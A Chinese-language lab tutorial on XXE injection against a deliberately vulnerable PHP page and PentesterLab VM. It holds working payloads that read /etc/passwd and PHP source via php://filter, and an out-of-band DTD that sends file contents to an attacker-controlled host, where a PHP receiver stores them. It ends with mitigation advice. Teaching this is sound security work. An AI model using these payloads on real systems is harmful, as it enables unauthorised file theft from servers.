XXE 漏洞任意文件读取

0x01 前言

XXE漏洞全称（XML External Entity Injection），即XML外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成：文件读取、命令执行、内网端口扫描、攻击内网网站，DOS攻击 等危害.（xxe漏洞触发的点往往是可以上传xml文件的位置的，没有对上传的xml文件进行过滤，导致可上传恶意xml文件.）

0x02 实战阶段

实验环境：开启 Metasploitable 靶机

IP：192.168.37.132 用户：root 密码：123456

注：这里可以在 metasploitable 中进行试验，不可以在 centos 中进行试验，因为默认情况下

centos 中已经修复相关漏洞。

#在网站根目录下新建一个php页面，插入以下内容

<?php$xml=file_get_contents("php://input");$data = simplexml_load_string($xml) ;echo "<pre>" ;print_r($data) ;echo "</pre>" ;?>

代码解释：

file_get_contents() 函数把整个文件读入一个字符串中。

php://input #是个可以访问请求的原始数据的只读流。

结合 file_get_contents(“php://input”)可以读取 POST 提交的数据。存入$xml

simplexml_load_string 函数介绍

php 中的 simplexml_load_string 函数将 xml 格式字符串转换为对应的 SimpleXMLElement

Object

例：使用 simplexml_load_string 将 note 输入 XML 数值打印出来

root@metasploitable:~# vim test.php

<?php$note=<<<XML<note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>XML;$xml=simplexml_load_string($note);print_r($xml);?>

访问：http://192.168.36.128/test.php

SimpleXMLElement Object ( [to] => Tove [from] => Jani [heading] => Reminder [body]=> Don't forget me this weekend! )

注：黑客进行 XXE 注入的思路：

1、file_get_contents(“php://input”)可以读取 POST 提交的数据，

2、那么我们通过 POST 提交 XML 代码，

3、XML 代码中引用外部 DTD，读取黑客想要的系统文件

4、通过 simplexml_load_string()函数显示数据。

即通过 simplexml_load_string()函数将 XML 代码和引用的系统文件转换成 SimpleXMLElement

Object 格式打印出来，此时加载的系统文件也会被打印出来。

XXE 漏洞演示：

在 Kali 中开启 burpsuite 截断

访问：http://192.168.36.128/xxe.php

Payload 内容如下：

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:////etc/passwd" >]><root><name>&xxe;</name></root>

在上面的代码中， XML 外部实体（外部实体在 XML 中被引用） xxe 被赋予的值为：

file:///etc/passwd。在解析 XML 文档的过程中，实体 'xxe' 的值会被替换为

URI(file://etc/passwd)内容值（也就是 passwd 文件的内容）。关键字 'SYSTEM' 会告诉 XML 解析

器，'xxe' 实体的值将从其后的 URI 中读取，并把读取的内容替换 xxe 出现的地方。

假如 SYSTEM 后面的内容可以被用户控制，那么用户就可以随意替换为其他内容，从而读取服务器

本地文件（file:///etc/passwd)或者远程文件（http://www.baidu.com/abc.txt）

读取 PHP 文件

修改 payload 读取 xxe.php 文件，代码如下：

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///xxe.php" >]><root><name>&xxe;</name></root>

注：发现没有读取到文件的内容，原因是 php 文件需要进行加密才能够被读取。

修改 payload，代码如下：

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php" >]><root><name>&xxe;</name></root>

php 文件经过 base64 加密之后就可以正常读取了，在 Kali 中使用 base64 进行解密获取文本内

容。

echo"PD9waHAKJHhtbD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKJGRhdGE9c2ltcGxleG1sX2xvYWRfc3RyaW5nKCR4bWwpOwplY2hvICI8cHJlPiI7CnByaW50X3IoJGRhdGEpOwplY2hvICI8L3ByZT4iOwo/Pgo=" | base64 -d

弹出以下内容：

<?php$xml=file_get_contents("php://input");$data = simplexml_load_string($xml) ;echo "<pre>" ;print_r($data) ;echo "</pre>" ;?>

无回显文件读取：

实验环境搭建

安装 PentesterLab 虚拟机。

新建虚拟机

选择镜像

选择操作系统与内核版本

设置虚拟机存储位置

优化硬件配置

开启虚拟机，虚拟机没有密码开机会自动登录。也不需要安装等操作步骤。

查看 IP 地址，这里不做演示，有手就行

实验拓扑

实验环境描述：Kali 作为黑客并建立黑客接收和提交数据的 Web 站点，PentesterLab 作为

server 被攻击端。

Kali 服务器准备工作：

我们需要建立一个外部的 dtd 文件，一个用于接收数据的 php 文件，以及存储数据的数据文件。

1、建立 dtd 外部实体文件：

打开网站根目录

vim test.dtd #插入以下内容

<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.36.128/xxe.php?pass=%p1;'>">%p2;

注：% p1 定义一个参数实体，%和 p1 之间有一个空格，用于接收 file:///etc/passwd 的内

容，%p1 引用参数实体，参数实体只能在 DTD 文件中被引用。

建立 php 文件

vim xxe.php #插入以下内容

<?php$pass=$_GET['pass'];file_put_contents('pass.txt',$pass);?>

创建存储数据的文件

touch pass.txt

修改文件权限

chown -R www-data:www-data /var/www/html/*

启动 apache2

systemctl start apache2

测试 php 文件能够正常写入数据

curl http://192.168.36.128/xxe.php?pass=1

cat pass.txt

1

进行 XXE 攻击

Kali 中停止截断：

访问 PentesterLab 地址：http://192.168.36.132/我的地址是 192.168.36.132，大家要访问自己的地址。

点击 Login

开启 burpsuite 进行截断

直接点击登录，不需要输入用户名密码

Payload 代码：

<?xml version="1.0"?><!DOCTYPE e1 SYSTEM "http://192.168.36.128/test.dtd"><foo>&e1;</foo>

修改抓到包的内容

改：Content-Type: application/x-www-form-urlencoded

为：Content-Type: text/xml

插入Payload 代码

获取 passwd 文件内容

cat pass.txt

root:x:0:0:root:/root:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/false

tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh

pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh

play:x:100:65534:Linux User,,,:/opt/play-2.1.3/xxe/:/bin/false

mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false

0x03 修补建议

升级 libxml 版本

libxml2.9.0 以后，默认不解析外部实体

http://www.linuxfromscratch.org/blfs/view/cvs/general/libxml2.html

代码层防御

使用开发语言提供的禁用外部实体的方法

PHP：

libxml_disable_entity_loader(true);

JAVA：

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

dbf.setExpandEntityReferences(false);

Python：

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的 XML 数据

关键词：<!DOCTYPE 和<!ENTITY，或者，SYSTEM 和 PUBLIC。